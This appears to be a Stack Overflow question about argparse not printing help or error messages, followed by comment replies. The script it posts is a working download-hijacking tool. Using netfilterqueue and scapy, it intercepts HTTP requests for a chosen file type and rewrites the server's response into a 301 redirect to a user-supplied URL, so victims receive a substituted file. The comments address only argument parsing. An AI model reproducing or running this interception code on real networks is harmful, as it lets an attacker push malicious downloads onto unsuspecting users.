# Unable to use Argparse

Tags: python, network-programming, argparse, scapy

The code provided below accepts the arguments but it doesn't print help menu while specifying `-h`. The error method doesn't print the specified message when any argument is missing. Am I missing something?

I expect the code to print a custom message when no arguments are given or when one is missing.

```py
import netfilterqueue
import scapy.all as scapy
from termcolor import colored
import argparse

seq_list = []

def get_argurments():
    parse = argparse.ArgumentParser()
    parse.add_argument("-f", "--filetype", dest="filetype", help="Press -h for Help.")
    parse.add_argument("-u", "--url", dest="url", help="Press -h for Help." )
    args = parse.parse_args()
    return args

def process_queue():
    queue = netfilterqueue.NetfilterQueue()  # Creating an Instance of NetFilterQueue.
    queue.bind(0, process_packets)  # Binding the instance to the '0' Queue-num in Iptables rule.
    queue.run()

def set_packet_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

def process_packets(packet):
    args = get_argurments()
    scapy_packet = scapy.IP(packet.get_payload()) # To convert the Raw packets into scapy packets.
    if scapy_packet.haslayer(scapy.Raw):          # Checking for Raw Layer which contains the useful Data.
        if scapy_packet.haslayer(scapy.TCP):
            if scapy_packet[scapy.TCP].dport == 80:
                if args.filetype in scapy_packet[scapy.Raw].load:
                    print(colored("[+] File Request", "yellow"))
                    load = scapy_packet[scapy.Raw].load
                    print(colored("[+] Request >> ", "green") + load)
                    seq_list.append(scapy_packet[scapy.TCP].ack)
            elif scapy_packet[scapy.TCP].sport == 80:
                if scapy_packet[scapy.TCP].seq in seq_list:
                    seq_list.remove(scapy_packet[scapy.TCP].seq)
                    print(colored("[+] Replacing File", "green"))
                    modified_packet = set_packet_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: "+ args.url + "\n\n")
                    modified_response = scapy_packet[scapy.Raw].load
                    print(colored("[+] Modified Response >> " + modified_response))
                    packet.set_payload(str(modified_packet))
    packet.accept()                               # Forwarding the Packets.

def launch_attack():
    print(colored("[+] File Interceptor running... Make sure you specified the FileType (-f) and Replacement File URL (-u) ", "green"))
    try:
        process_queue()
    except KeyboardInterrupt:
        print(colored("[-] Ctrl-C Detected... Quitting..", "yellow"))

launch_attack()
```

Comment: You don't need to call `get_argurments` twice in `process_packets`. The first call parses the arguments, then discards the result. The second one re-parses  them and assigns the result to the name `args`.

Comment: Sorry, but that was not a Mistake. I called it twice, hoping that it would execute the Function as desired. That was a silly mistake.. BTW any help on the Actual Problem?

Comment: It's not clear why you are calling `get_argurments` from `process_packets`. It seems like something that should be called before you ever call `launch_attack`, with the results either used globally or passed as an argument.

Comment: I am using the get_arguments from process_packets to access the user input passed as arguments. The program works fine with accessing the user arguments. The only problem with the code is that it doesn't display help message when no arguments are specified or one is missed. The error method in argparse doesn't display the error too.

Comment: `parse_args` exits the current process in that case. I'm not familiar with `netfilterqueue`, so I don't know what it does when `process_packets` results in a call to `sys.exit`.

Comment: None of the arguments is required, so I don't expect a missing argument error.